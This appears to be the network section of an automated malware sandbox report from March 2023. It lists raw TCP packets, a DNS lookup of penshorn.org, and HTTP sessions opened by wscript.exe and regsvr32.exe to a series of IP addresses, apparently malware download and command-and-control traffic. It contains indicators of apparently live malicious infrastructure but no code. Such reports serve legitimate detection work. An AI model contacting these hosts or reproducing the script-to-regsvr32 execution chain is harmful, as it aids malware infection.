                                                                                                Mar 17, 2023 09:06:24.609370947 CET44349685203.26.41.131192.168.2.4
                                                                                                Mar 17, 2023 09:06:24.994668007 CET44349685203.26.41.131192.168.2.4
                                                                                                Mar 17, 2023 09:06:24.994738102 CET44349685203.26.41.131192.168.2.4
                                                                                                Mar 17, 2023 09:06:24.994751930 CET44349685203.26.41.131192.168.2.4
                                                                                                Mar 17, 2023 09:06:24.994915009 CET49685443192.168.2.4203.26.41.131
                                                                                                Mar 17, 2023 09:06:24.994952917 CET44349685203.26.41.131192.168.2.4
                                                                                                Mar 17, 2023 09:06:25.041630030 CET49685443192.168.2.4203.26.41.131
                                                                                                Mar 17, 2023 09:06:25.288188934 CET44349685203.26.41.131192.168.2.4
                                                                                                Mar 17, 2023 09:06:25.288209915 CET44349685203.26.41.131192.168.2.4
                                                                                                Mar 17, 2023 09:06:25.288275003 CET44349685203.26.41.131192.168.2.4
                                                                                                Mar 17, 2023 09:06:25.288302898 CET44349685203.26.41.131192.168.2.4
                                                                                                Mar 17, 2023 09:06:25.288367987 CET49685443192.168.2.4203.26.41.131
                                                                                                Mar 17, 2023 09:06:25.288424969 CET49685443192.168.2.4203.26.41.131
                                                                                                Mar 17, 2023 09:06:25.288435936 CET44349685203.26.41.131192.168.2.4
                                                                                                Mar 17, 2023 09:06:25.288451910 CET44349685203.26.41.131192.168.2.4
                                                                                                Mar 17, 2023 09:06:25.288485050 CET49685443192.168.2.4203.26.41.131
                                                                                                Mar 17, 2023 09:06:25.288492918 CET44349685203.26.41.131192.168.2.4
                                                                                                Mar 17, 2023 09:06:25.288507938 CET44349685203.26.41.131192.168.2.4
                                                                                                Mar 17, 2023 09:06:25.288532019 CET49685443192.168.2.4203.26.41.131
                                                                                                Mar 17, 2023 09:06:25.288547039 CET49685443192.168.2.4203.26.41.131
                                                                                                Mar 17, 2023 09:06:25.288768053 CET44349685203.26.41.131192.168.2.4
                                                                                                Mar 17, 2023 09:06:25.288861990 CET49685443192.168.2.4203.26.41.131
                                                                                                Mar 17, 2023 09:06:25.288882017 CET44349685203.26.41.131192.168.2.4
                                                                                                Mar 17, 2023 09:06:25.338562965 CET49685443192.168.2.4203.26.41.131
                                                                                                Mar 17, 2023 09:06:25.584767103 CET44349685203.26.41.131192.168.2.4
                                                                                                Mar 17, 2023 09:06:25.584847927 CET44349685203.26.41.131192.168.2.4
                                                                                                Mar 17, 2023 09:06:25.584903002 CET44349685203.26.41.131192.168.2.4
                                                                                                Mar 17, 2023 09:06:25.585098028 CET44349685203.26.41.131192.168.2.4
                                                                                                Mar 17, 2023 09:06:25.585115910 CET44349685203.26.41.131192.168.2.4
                                                                                                Mar 17, 2023 09:06:25.585223913 CET49685443192.168.2.4203.26.41.131
                                                                                                Mar 17, 2023 09:06:25.585323095 CET44349685203.26.41.131192.168.2.4
                                                                                                Mar 17, 2023 09:06:25.585350037 CET44349685203.26.41.131192.168.2.4
                                                                                                Mar 17, 2023 09:06:25.585381985 CET44349685203.26.41.131192.168.2.4
                                                                                                Mar 17, 2023 09:06:25.585386992 CET49685443192.168.2.4203.26.41.131
                                                                                                Mar 17, 2023 09:06:25.585402012 CET44349685203.26.41.131192.168.2.4
                                                                                                Mar 17, 2023 09:06:25.585417986 CET44349685203.26.41.131192.168.2.4
                                                                                                Mar 17, 2023 09:06:25.585458040 CET49685443192.168.2.4203.26.41.131
                                                                                                Mar 17, 2023 09:06:25.585460901 CET44349685203.26.41.131192.168.2.4
                                                                                                Mar 17, 2023 09:06:25.585566044 CET49685443192.168.2.4203.26.41.131
                                                                                                Mar 17, 2023 09:06:25.585614920 CET44349685203.26.41.131192.168.2.4
                                                                                                Mar 17, 2023 09:06:25.585689068 CET49685443192.168.2.4203.26.41.131
                                                                                                Mar 17, 2023 09:06:25.585715055 CET44349685203.26.41.131192.168.2.4
                                                                                                Mar 17, 2023 09:06:25.585788965 CET49685443192.168.2.4203.26.41.131
                                                                                                Mar 17, 2023 09:06:25.585861921 CET44349685203.26.41.131192.168.2.4
                                                                                                Mar 17, 2023 09:06:25.585906982 CET49685443192.168.2.4203.26.41.131
                                                                                                Mar 17, 2023 09:06:25.585973024 CET44349685203.26.41.131192.168.2.4
                                                                                                Mar 17, 2023 09:06:25.586003065 CET49685443192.168.2.4203.26.41.131
                                                                                                Mar 17, 2023 09:06:25.586055040 CET49685443192.168.2.4203.26.41.131
                                                                                                Mar 17, 2023 09:06:25.586069107 CET44349685203.26.41.131192.168.2.4
                                                                                                Mar 17, 2023 09:06:25.635458946 CET49685443192.168.2.4203.26.41.131
                                                                                                Mar 17, 2023 09:06:25.880130053 CET44349685203.26.41.131192.168.2.4
                                                                                                Mar 17, 2023 09:06:25.880234003 CET44349685203.26.41.131192.168.2.4
                                                                                                Mar 17, 2023 09:06:25.880363941 CET49685443192.168.2.4203.26.41.131
                                                                                                Mar 17, 2023 09:06:25.880420923 CET44349685203.26.41.131192.168.2.4
                                                                                                Mar 17, 2023 09:06:25.880460978 CET44349685203.26.41.131192.168.2.4
                                                                                                Mar 17, 2023 09:06:25.880480051 CET49685443192.168.2.4203.26.41.131
                                                                                                Mar 17, 2023 09:06:25.880518913 CET49685443192.168.2.4203.26.41.131
                                                                                                Mar 17, 2023 09:06:25.880537033 CET44349685203.26.41.131192.168.2.4
                                                                                                Mar 17, 2023 09:06:25.880575895 CET44349685203.26.41.131192.168.2.4
                                                                                                Mar 17, 2023 09:06:25.880578995 CET49685443192.168.2.4203.26.41.131
                                                                                                Mar 17, 2023 09:06:25.880618095 CET49685443192.168.2.4203.26.41.131
                                                                                                Mar 17, 2023 09:06:25.880634069 CET44349685203.26.41.131192.168.2.4
                                                                                                Mar 17, 2023 09:06:25.880665064 CET49685443192.168.2.4203.26.41.131
                                                                                                Mar 17, 2023 09:06:25.880707979 CET49685443192.168.2.4203.26.41.131
                                                                                                Mar 17, 2023 09:06:25.880729914 CET44349685203.26.41.131192.168.2.4
                                                                                                Mar 17, 2023 09:06:25.880789995 CET44349685203.26.41.131192.168.2.4
                                                                                                Mar 17, 2023 09:06:25.880866051 CET49685443192.168.2.4203.26.41.131
                                                                                                Mar 17, 2023 09:06:25.880877018 CET44349685203.26.41.131192.168.2.4
                                                                                                Mar 17, 2023 09:06:25.880902052 CET44349685203.26.41.131192.168.2.4
                                                                                                Mar 17, 2023 09:06:25.880980015 CET49685443192.168.2.4203.26.41.131
                                                                                                Mar 17, 2023 09:06:25.880999088 CET44349685203.26.41.131192.168.2.4
                                                                                                Mar 17, 2023 09:06:25.881041050 CET44349685203.26.41.131192.168.2.4
                                                                                                Mar 17, 2023 09:06:25.881071091 CET49685443192.168.2.4203.26.41.131
                                                                                                Mar 17, 2023 09:06:25.881089926 CET44349685203.26.41.131192.168.2.4
                                                                                                Mar 17, 2023 09:06:25.881118059 CET49685443192.168.2.4203.26.41.131
                                                                                                Mar 17, 2023 09:06:25.881124020 CET44349685203.26.41.131192.168.2.4
                                                                                                Mar 17, 2023 09:06:25.881170988 CET49685443192.168.2.4203.26.41.131
                                                                                                Mar 17, 2023 09:06:25.881191969 CET44349685203.26.41.131192.168.2.4
                                                                                                Mar 17, 2023 09:06:25.881225109 CET49685443192.168.2.4203.26.41.131
                                                                                                Mar 17, 2023 09:06:25.881257057 CET49685443192.168.2.4203.26.41.131
                                                                                                Mar 17, 2023 09:06:25.881270885 CET44349685203.26.41.131192.168.2.4
                                                                                                Mar 17, 2023 09:06:25.881325960 CET44349685203.26.41.131192.168.2.4
                                                                                                Mar 17, 2023 09:06:25.881397963 CET44349685203.26.41.131192.168.2.4
                                                                                                Mar 17, 2023 09:06:25.881427050 CET49685443192.168.2.4203.26.41.131
                                                                                                Mar 17, 2023 09:06:25.881447077 CET44349685203.26.41.131192.168.2.4
                                                                                                Mar 17, 2023 09:06:25.881500959 CET49685443192.168.2.4203.26.41.131
                                                                                                Mar 17, 2023 09:06:25.881529093 CET44349685203.26.41.131192.168.2.4
                                                                                                Mar 17, 2023 09:06:25.881551027 CET49685443192.168.2.4203.26.41.131
                                                                                                Mar 17, 2023 09:06:25.881572962 CET44349685203.26.41.131192.168.2.4
                                                                                                Mar 17, 2023 09:06:25.881601095 CET49685443192.168.2.4203.26.41.131
                                                                                                Mar 17, 2023 09:06:25.881608963 CET44349685203.26.41.131192.168.2.4
                                                                                                Mar 17, 2023 09:06:25.881689072 CET49685443192.168.2.4203.26.41.131
                                                                                                Mar 17, 2023 09:06:25.881707907 CET44349685203.26.41.131192.168.2.4
                                                                                                Mar 17, 2023 09:06:25.883764982 CET49685443192.168.2.4203.26.41.131
                                                                                                Mar 17, 2023 09:06:25.883919954 CET49685443192.168.2.4203.26.41.131
                                                                                                Mar 17, 2023 09:06:26.174511909 CET44349685203.26.41.131192.168.2.4
                                                                                                Mar 17, 2023 09:06:26.174762011 CET44349685203.26.41.131192.168.2.4
                                                                                                Mar 17, 2023 09:06:26.174784899 CET49685443192.168.2.4203.26.41.131
                                                                                                Mar 17, 2023 09:06:26.174832106 CET44349685203.26.41.131192.168.2.4
                                                                                                Mar 17, 2023 09:06:26.174884081 CET49685443192.168.2.4203.26.41.131
                                                                                                Mar 17, 2023 09:06:26.174917936 CET49685443192.168.2.4203.26.41.131
                                                                                                Mar 17, 2023 09:06:26.175000906 CET44349685203.26.41.131192.168.2.4
                                                                                                Mar 17, 2023 09:06:26.175218105 CET44349685203.26.41.131192.168.2.4
                                                                                                Mar 17, 2023 09:06:26.175321102 CET49685443192.168.2.4203.26.41.131
                                                                                                Mar 17, 2023 09:06:26.175335884 CET44349685203.26.41.131192.168.2.4
                                                                                                Mar 17, 2023 09:06:26.175364017 CET44349685203.26.41.131192.168.2.4
                                                                                                Mar 17, 2023 09:06:26.175456047 CET49685443192.168.2.4203.26.41.131
                                                                                                Mar 17, 2023 09:06:26.175470114 CET44349685203.26.41.131192.168.2.4
                                                                                                Mar 17, 2023 09:06:26.175741911 CET44349685203.26.41.131192.168.2.4
                                                                                                Mar 17, 2023 09:06:26.175849915 CET49685443192.168.2.4203.26.41.131
                                                                                                Mar 17, 2023 09:06:26.175863981 CET44349685203.26.41.131192.168.2.4
                                                                                                Mar 17, 2023 09:06:26.175906897 CET44349685203.26.41.131192.168.2.4
                                                                                                Mar 17, 2023 09:06:26.176029921 CET49685443192.168.2.4203.26.41.131
                                                                                                Mar 17, 2023 09:06:26.176042080 CET44349685203.26.41.131192.168.2.4
                                                                                                Mar 17, 2023 09:06:26.176156044 CET44349685203.26.41.131192.168.2.4
                                                                                                Mar 17, 2023 09:06:26.176229000 CET44349685203.26.41.131192.168.2.4
                                                                                                Mar 17, 2023 09:06:26.176253080 CET49685443192.168.2.4203.26.41.131
                                                                                                Mar 17, 2023 09:06:26.176274061 CET44349685203.26.41.131192.168.2.4
                                                                                                Mar 17, 2023 09:06:26.176301956 CET49685443192.168.2.4203.26.41.131
                                                                                                Mar 17, 2023 09:06:26.176328897 CET49685443192.168.2.4203.26.41.131
                                                                                                Mar 17, 2023 09:06:26.176418066 CET44349685203.26.41.131192.168.2.4
                                                                                                Mar 17, 2023 09:06:26.176502943 CET49685443192.168.2.4203.26.41.131
                                                                                                Mar 17, 2023 09:06:26.176508904 CET44349685203.26.41.131192.168.2.4
                                                                                                Mar 17, 2023 09:06:26.176531076 CET44349685203.26.41.131192.168.2.4
                                                                                                Mar 17, 2023 09:06:26.176603079 CET49685443192.168.2.4203.26.41.131
                                                                                                Mar 17, 2023 09:06:26.176618099 CET44349685203.26.41.131192.168.2.4
                                                                                                Mar 17, 2023 09:06:26.176703930 CET44349685203.26.41.131192.168.2.4
                                                                                                Mar 17, 2023 09:06:26.176734924 CET49685443192.168.2.4203.26.41.131
                                                                                                Mar 17, 2023 09:06:26.176748991 CET44349685203.26.41.131192.168.2.4
                                                                                                Mar 17, 2023 09:06:26.176793098 CET49685443192.168.2.4203.26.41.131
                                                                                                Mar 17, 2023 09:06:26.176803112 CET44349685203.26.41.131192.168.2.4
                                                                                                Mar 17, 2023 09:06:26.176836014 CET49685443192.168.2.4203.26.41.131
                                                                                                Mar 17, 2023 09:06:26.176847935 CET44349685203.26.41.131192.168.2.4
                                                                                                Mar 17, 2023 09:06:26.176875114 CET49685443192.168.2.4203.26.41.131
                                                                                                Mar 17, 2023 09:06:26.176908970 CET49685443192.168.2.4203.26.41.131
                                                                                                Mar 17, 2023 09:06:26.176917076 CET44349685203.26.41.131192.168.2.4
                                                                                                Mar 17, 2023 09:06:26.176939964 CET44349685203.26.41.131192.168.2.4
                                                                                                Mar 17, 2023 09:06:26.177005053 CET44349685203.26.41.131192.168.2.4
                                                                                                Mar 17, 2023 09:06:26.177006960 CET49685443192.168.2.4203.26.41.131
                                                                                                Mar 17, 2023 09:06:26.177025080 CET44349685203.26.41.131192.168.2.4
                                                                                                Mar 17, 2023 09:06:26.177084923 CET49685443192.168.2.4203.26.41.131
                                                                                                Mar 17, 2023 09:06:26.177160025 CET44349685203.26.41.131192.168.2.4
                                                                                                Mar 17, 2023 09:06:26.177225113 CET44349685203.26.41.131192.168.2.4
                                                                                                Mar 17, 2023 09:06:26.177241087 CET49685443192.168.2.4203.26.41.131
                                                                                                Mar 17, 2023 09:06:26.177253962 CET44349685203.26.41.131192.168.2.4
                                                                                                Mar 17, 2023 09:06:26.177309036 CET49685443192.168.2.4203.26.41.131
                                                                                                Mar 17, 2023 09:06:26.177388906 CET44349685203.26.41.131192.168.2.4
                                                                                                Mar 17, 2023 09:06:26.177474976 CET49685443192.168.2.4203.26.41.131
                                                                                                Mar 17, 2023 09:06:26.177486897 CET44349685203.26.41.131192.168.2.4
                                                                                                Mar 17, 2023 09:06:26.177508116 CET44349685203.26.41.131192.168.2.4
                                                                                                Mar 17, 2023 09:06:26.177572012 CET49685443192.168.2.4203.26.41.131
                                                                                                Mar 17, 2023 09:06:26.177772999 CET49685443192.168.2.4203.26.41.131
                                                                                                Mar 17, 2023 09:06:26.179610968 CET49685443192.168.2.4203.26.41.131
                                                                                                Mar 17, 2023 09:06:26.179636002 CET44349685203.26.41.131192.168.2.4
                                                                                                Mar 17, 2023 09:06:26.179651976 CET49685443192.168.2.4203.26.41.131
                                                                                                Mar 17, 2023 09:06:26.179660082 CET44349685203.26.41.131192.168.2.4
                                                                                                Mar 17, 2023 09:07:07.082827091 CET496868080192.168.2.491.121.146.47
                                                                                                Mar 17, 2023 09:07:07.112083912 CET80804968691.121.146.47192.168.2.4
                                                                                                Mar 17, 2023 09:07:07.112323046 CET496868080192.168.2.491.121.146.47
                                                                                                Mar 17, 2023 09:07:07.137682915 CET496868080192.168.2.491.121.146.47
                                                                                                Mar 17, 2023 09:07:07.166542053 CET80804968691.121.146.47192.168.2.4
                                                                                                Mar 17, 2023 09:07:07.184624910 CET80804968691.121.146.47192.168.2.4
                                                                                                Mar 17, 2023 09:07:07.184667110 CET80804968691.121.146.47192.168.2.4
                                                                                                Mar 17, 2023 09:07:07.184835911 CET496868080192.168.2.491.121.146.47
                                                                                                Mar 17, 2023 09:07:07.193453074 CET496868080192.168.2.491.121.146.47
                                                                                                Mar 17, 2023 09:07:07.222291946 CET80804968691.121.146.47192.168.2.4
                                                                                                Mar 17, 2023 09:07:07.263881922 CET496868080192.168.2.491.121.146.47
                                                                                                Mar 17, 2023 09:07:13.351089001 CET496868080192.168.2.491.121.146.47
                                                                                                Mar 17, 2023 09:07:13.351146936 CET496868080192.168.2.491.121.146.47
                                                                                                Mar 17, 2023 09:07:13.378634930 CET80804968691.121.146.47192.168.2.4
                                                                                                Mar 17, 2023 09:07:13.877799988 CET80804968691.121.146.47192.168.2.4
                                                                                                Mar 17, 2023 09:07:13.920674086 CET496868080192.168.2.491.121.146.47
                                                                                                Mar 17, 2023 09:07:16.881594896 CET80804968691.121.146.47192.168.2.4
                                                                                                Mar 17, 2023 09:07:16.881666899 CET80804968691.121.146.47192.168.2.4
                                                                                                Mar 17, 2023 09:07:16.881794930 CET496868080192.168.2.491.121.146.47
                                                                                                Mar 17, 2023 09:07:16.881938934 CET496868080192.168.2.491.121.146.47
                                                                                                Mar 17, 2023 09:07:16.882110119 CET496868080192.168.2.491.121.146.47
                                                                                                Mar 17, 2023 09:07:16.909288883 CET80804968691.121.146.47192.168.2.4
                                                                                                Mar 17, 2023 09:07:16.909466028 CET80804968691.121.146.47192.168.2.4
                                                                                                Mar 17, 2023 09:07:17.980118036 CET496887080192.168.2.466.228.32.31
                                                                                                Mar 17, 2023 09:07:18.080662966 CET70804968866.228.32.31192.168.2.4
                                                                                                Mar 17, 2023 09:07:18.080837011 CET496887080192.168.2.466.228.32.31
                                                                                                Mar 17, 2023 09:07:18.081284046 CET496887080192.168.2.466.228.32.31
                                                                                                Mar 17, 2023 09:07:18.182641983 CET70804968866.228.32.31192.168.2.4
                                                                                                Mar 17, 2023 09:07:18.191973925 CET70804968866.228.32.31192.168.2.4
                                                                                                Mar 17, 2023 09:07:18.192049026 CET70804968866.228.32.31192.168.2.4
                                                                                                Mar 17, 2023 09:07:18.192212105 CET496887080192.168.2.466.228.32.31
                                                                                                Mar 17, 2023 09:07:18.204938889 CET496887080192.168.2.466.228.32.31
                                                                                                Mar 17, 2023 09:07:18.306385994 CET70804968866.228.32.31192.168.2.4
                                                                                                Mar 17, 2023 09:07:18.313245058 CET496887080192.168.2.466.228.32.31
                                                                                                Mar 17, 2023 09:07:18.453480959 CET70804968866.228.32.31192.168.2.4
                                                                                                Mar 17, 2023 09:07:19.321127892 CET70804968866.228.32.31192.168.2.4
                                                                                                Mar 17, 2023 09:07:19.374325991 CET496887080192.168.2.466.228.32.31
                                                                                                Mar 17, 2023 09:07:22.321366072 CET70804968866.228.32.31192.168.2.4
                                                                                                Mar 17, 2023 09:07:22.321445942 CET70804968866.228.32.31192.168.2.4
                                                                                                Mar 17, 2023 09:07:22.321580887 CET496887080192.168.2.466.228.32.31
                                                                                                Mar 17, 2023 09:07:22.321717024 CET496887080192.168.2.466.228.32.31
                                                                                                Mar 17, 2023 09:07:22.321760893 CET496887080192.168.2.466.228.32.31
                                                                                                Mar 17, 2023 09:07:22.421813011 CET70804968866.228.32.31192.168.2.4
                                                                                                Mar 17, 2023 09:07:22.421905994 CET70804968866.228.32.31192.168.2.4
                                                                                                Mar 17, 2023 09:07:23.162928104 CET49689443192.168.2.4182.162.143.56
                                                                                                Mar 17, 2023 09:07:23.163026094 CET44349689182.162.143.56192.168.2.4
                                                                                                Mar 17, 2023 09:07:23.163177967 CET49689443192.168.2.4182.162.143.56
                                                                                                Mar 17, 2023 09:07:23.164298058 CET49689443192.168.2.4182.162.143.56
                                                                                                Mar 17, 2023 09:07:23.164345026 CET44349689182.162.143.56192.168.2.4
                                                                                                Mar 17, 2023 09:07:23.942322016 CET44349689182.162.143.56192.168.2.4
                                                                                                Mar 17, 2023 09:07:23.942528963 CET49689443192.168.2.4182.162.143.56
                                                                                                Mar 17, 2023 09:07:23.949018002 CET49689443192.168.2.4182.162.143.56
                                                                                                Mar 17, 2023 09:07:23.949038982 CET44349689182.162.143.56192.168.2.4
                                                                                                Mar 17, 2023 09:07:23.949441910 CET44349689182.162.143.56192.168.2.4
                                                                                                Mar 17, 2023 09:07:23.951169968 CET49689443192.168.2.4182.162.143.56
                                                                                                Mar 17, 2023 09:07:23.951189041 CET44349689182.162.143.56192.168.2.4
                                                                                                Mar 17, 2023 09:07:25.046781063 CET44349689182.162.143.56192.168.2.4
                                                                                                Mar 17, 2023 09:07:25.046938896 CET44349689182.162.143.56192.168.2.4
                                                                                                Mar 17, 2023 09:07:25.047255039 CET49689443192.168.2.4182.162.143.56
                                                                                                Mar 17, 2023 09:07:25.048105001 CET49689443192.168.2.4182.162.143.56
                                                                                                Mar 17, 2023 09:07:25.048147917 CET44349689182.162.143.56192.168.2.4
                                                                                                Mar 17, 2023 09:07:25.048180103 CET49689443192.168.2.4182.162.143.56
                                                                                                Mar 17, 2023 09:07:25.048194885 CET44349689182.162.143.56192.168.2.4
                                                                                                Mar 17, 2023 09:07:30.974205971 CET4969080192.168.2.4187.63.160.88
                                                                                                Mar 17, 2023 09:07:31.203985929 CET8049690187.63.160.88192.168.2.4
                                                                                                Mar 17, 2023 09:07:31.204660892 CET4969080192.168.2.4187.63.160.88
                                                                                                Mar 17, 2023 09:07:31.205951929 CET4969080192.168.2.4187.63.160.88
                                                                                                Mar 17, 2023 09:07:31.435683966 CET8049690187.63.160.88192.168.2.4
                                                                                                Mar 17, 2023 09:07:31.450947046 CET8049690187.63.160.88192.168.2.4
                                                                                                Mar 17, 2023 09:07:31.450994015 CET8049690187.63.160.88192.168.2.4
                                                                                                Mar 17, 2023 09:07:31.451162100 CET4969080192.168.2.4187.63.160.88
                                                                                                Mar 17, 2023 09:07:31.456162930 CET4969080192.168.2.4187.63.160.88
                                                                                                Mar 17, 2023 09:07:31.686403036 CET8049690187.63.160.88192.168.2.4
                                                                                                Mar 17, 2023 09:07:31.688262939 CET4969080192.168.2.4187.63.160.88
                                                                                                Mar 17, 2023 09:07:31.957545042 CET8049690187.63.160.88192.168.2.4
                                                                                                Mar 17, 2023 09:07:32.965385914 CET8049690187.63.160.88192.168.2.4
                                                                                                Mar 17, 2023 09:07:33.016030073 CET4969080192.168.2.4187.63.160.88
                                                                                                Mar 17, 2023 09:07:35.964777946 CET8049690187.63.160.88192.168.2.4
                                                                                                Mar 17, 2023 09:07:35.964816093 CET8049690187.63.160.88192.168.2.4
                                                                                                Mar 17, 2023 09:07:35.964976072 CET4969080192.168.2.4187.63.160.88
                                                                                                Mar 17, 2023 09:07:35.968456030 CET4969080192.168.2.4187.63.160.88
                                                                                                Mar 17, 2023 09:07:35.968518019 CET4969080192.168.2.4187.63.160.88
                                                                                                Mar 17, 2023 09:07:36.198014975 CET8049690187.63.160.88192.168.2.4
                                                                                                Mar 17, 2023 09:07:36.198091984 CET8049690187.63.160.88192.168.2.4
                                                                                                Mar 17, 2023 09:07:36.723536015 CET496918080192.168.2.4167.172.199.165
                                                                                                Mar 17, 2023 09:07:36.892431974 CET808049691167.172.199.165192.168.2.4
                                                                                                Mar 17, 2023 09:07:37.407073975 CET496918080192.168.2.4167.172.199.165
                                                                                                Mar 17, 2023 09:07:37.574215889 CET808049691167.172.199.165192.168.2.4
                                                                                                Mar 17, 2023 09:07:38.079041004 CET496918080192.168.2.4167.172.199.165
                                                                                                Mar 17, 2023 09:07:38.246161938 CET808049691167.172.199.165192.168.2.4
                                                                                                Mar 17, 2023 09:07:43.728916883 CET49692443192.168.2.4164.90.222.65
                                                                                                Mar 17, 2023 09:07:43.728981018 CET44349692164.90.222.65192.168.2.4
                                                                                                Mar 17, 2023 09:07:43.729094982 CET49692443192.168.2.4164.90.222.65
                                                                                                Mar 17, 2023 09:07:43.729778051 CET49692443192.168.2.4164.90.222.65
                                                                                                Mar 17, 2023 09:07:43.729794979 CET44349692164.90.222.65192.168.2.4
                                                                                                Mar 17, 2023 09:07:43.762868881 CET44349692164.90.222.65192.168.2.4
                                                                                                Mar 17, 2023 09:07:43.764467955 CET49693443192.168.2.4164.90.222.65
                                                                                                Mar 17, 2023 09:07:43.764552116 CET44349693164.90.222.65192.168.2.4
                                                                                                Mar 17, 2023 09:07:43.764771938 CET49693443192.168.2.4164.90.222.65
                                                                                                Mar 17, 2023 09:07:43.766184092 CET49693443192.168.2.4164.90.222.65
                                                                                                Mar 17, 2023 09:07:43.766242027 CET44349693164.90.222.65192.168.2.4
                                                                                                Mar 17, 2023 09:07:43.800620079 CET44349693164.90.222.65192.168.2.4
                                                                                                Mar 17, 2023 09:07:43.804982901 CET49694443192.168.2.4164.90.222.65
                                                                                                Mar 17, 2023 09:07:43.805053949 CET44349694164.90.222.65192.168.2.4
                                                                                                Mar 17, 2023 09:07:43.805609941 CET49694443192.168.2.4164.90.222.65
                                                                                                Mar 17, 2023 09:07:43.807570934 CET49694443192.168.2.4164.90.222.65
                                                                                                Mar 17, 2023 09:07:43.807612896 CET44349694164.90.222.65192.168.2.4
                                                                                                Mar 17, 2023 09:07:43.841613054 CET44349694164.90.222.65192.168.2.4
                                                                                                Mar 17, 2023 09:07:43.847589016 CET49695443192.168.2.4164.90.222.65
                                                                                                Mar 17, 2023 09:07:43.847645044 CET44349695164.90.222.65192.168.2.4
                                                                                                Mar 17, 2023 09:07:43.847801924 CET49695443192.168.2.4164.90.222.65
                                                                                                Mar 17, 2023 09:07:43.848376036 CET49695443192.168.2.4164.90.222.65
                                                                                                Mar 17, 2023 09:07:43.848397017 CET44349695164.90.222.65192.168.2.4
                                                                                                Mar 17, 2023 09:07:43.882746935 CET44349695164.90.222.65192.168.2.4
                                                                                                Mar 17, 2023 09:07:50.440401077 CET496968080192.168.2.4104.168.155.143
                                                                                                Mar 17, 2023 09:07:50.604892969 CET808049696104.168.155.143192.168.2.4
                                                                                                Mar 17, 2023 09:07:51.199918032 CET496968080192.168.2.4104.168.155.143
                                                                                                Mar 17, 2023 09:07:51.364449024 CET808049696104.168.155.143192.168.2.4
                                                                                                Mar 17, 2023 09:07:51.899883032 CET496968080192.168.2.4104.168.155.143
                                                                                                Mar 17, 2023 09:07:52.064246893 CET808049696104.168.155.143192.168.2.4
                                                                                                Mar 17, 2023 09:07:57.417993069 CET496978080192.168.2.4163.44.196.120
                                                                                                Mar 17, 2023 09:07:57.630830050 CET808049697163.44.196.120192.168.2.4
                                                                                                Mar 17, 2023 09:07:58.145246029 CET496978080192.168.2.4163.44.196.120
                                                                                                Mar 17, 2023 09:07:58.358165979 CET808049697163.44.196.120192.168.2.4
                                                                                                Mar 17, 2023 09:07:58.869560003 CET496978080192.168.2.4163.44.196.120
                                                                                                Mar 17, 2023 09:07:59.082464933 CET808049697163.44.196.120192.168.2.4
                                                                                                Mar 17, 2023 09:08:04.454890013 CET496988080192.168.2.4160.16.142.56
                                                                                                Mar 17, 2023 09:08:07.601447105 CET496988080192.168.2.4160.16.142.56
                                                                                                Mar 17, 2023 09:08:13.601902008 CET496988080192.168.2.4160.16.142.56
                                                                                                Mar 17, 2023 09:08:20.420095921 CET49699443192.168.2.4159.89.202.34
                                                                                                Mar 17, 2023 09:08:20.420196056 CET44349699159.89.202.34192.168.2.4
                                                                                                Mar 17, 2023 09:08:20.420330048 CET49699443192.168.2.4159.89.202.34
                                                                                                Mar 17, 2023 09:08:20.421067953 CET49699443192.168.2.4159.89.202.34
                                                                                                Mar 17, 2023 09:08:20.421127081 CET44349699159.89.202.34192.168.2.4
                                                                                                Mar 17, 2023 09:08:20.689342022 CET44349699159.89.202.34192.168.2.4
                                                                                                Mar 17, 2023 09:08:20.691514015 CET49700443192.168.2.4159.89.202.34
                                                                                                Mar 17, 2023 09:08:20.691600084 CET44349700159.89.202.34192.168.2.4
                                                                                                Mar 17, 2023 09:08:20.692032099 CET49700443192.168.2.4159.89.202.34
                                                                                                Mar 17, 2023 09:08:20.692589045 CET49700443192.168.2.4159.89.202.34
                                                                                                Mar 17, 2023 09:08:20.692627907 CET44349700159.89.202.34192.168.2.4
                                                                                                Mar 17, 2023 09:08:20.958555937 CET44349700159.89.202.34192.168.2.4
                                                                                                Mar 17, 2023 09:08:20.961616039 CET49701443192.168.2.4159.89.202.34
                                                                                                Mar 17, 2023 09:08:20.961689949 CET44349701159.89.202.34192.168.2.4
                                                                                                Mar 17, 2023 09:08:20.962076902 CET49701443192.168.2.4159.89.202.34
                                                                                                Mar 17, 2023 09:08:20.962744951 CET49701443192.168.2.4159.89.202.34
                                                                                                Mar 17, 2023 09:08:20.962775946 CET44349701159.89.202.34192.168.2.4
                                                                                                Mar 17, 2023 09:08:21.261420012 CET44349701159.89.202.34192.168.2.4
                                                                                                Mar 17, 2023 09:08:21.263144016 CET49702443192.168.2.4159.89.202.34
                                                                                                Mar 17, 2023 09:08:21.263223886 CET44349702159.89.202.34192.168.2.4
                                                                                                Mar 17, 2023 09:08:21.263452053 CET49702443192.168.2.4159.89.202.34
                                                                                                Mar 17, 2023 09:08:21.264353037 CET49702443192.168.2.4159.89.202.34
                                                                                                Mar 17, 2023 09:08:21.264384031 CET44349702159.89.202.34192.168.2.4
                                                                                                Mar 17, 2023 09:08:21.523734093 CET44349702159.89.202.34192.168.2.4

                                                                                                UDP Packets

                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                Mar 17, 2023 09:06:23.756524086 CET6257753192.168.2.48.8.8.8
                                                                                                Mar 17, 2023 09:06:23.774235964 CET53625778.8.8.8192.168.2.4

                                                                                                DNS Queries

                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                Mar 17, 2023 09:06:23.756524086 CET192.168.2.48.8.8.80xeaaaStandard query (0)penshorn.orgA (IP address)IN (0x0001)false

                                                                                                DNS Answers

                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                Mar 17, 2023 09:06:23.774235964 CET8.8.8.8192.168.2.40xeaaaNo error (0)penshorn.org203.26.41.131A (IP address)IN (0x0001)false

                                                                                                HTTP Request Dependency Graph

                                                                                                • penshorn.org
                                                                                                • 182.162.143.56

                                                                                                HTTP Packets

                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                0192.168.2.449685203.26.41.131443C:\Windows\SysWOW64\wscript.exe
                                                                                                TimestampkBytes transferredDirectionData


                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                1192.168.2.449689182.162.143.56443C:\Windows\System32\regsvr32.exe
                                                                                                TimestampkBytes transferredDirectionData


                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                2192.168.2.449690187.63.160.8880C:\Windows\System32\regsvr32.exe
                                                                                                TimestampkBytes transferredDirectionData
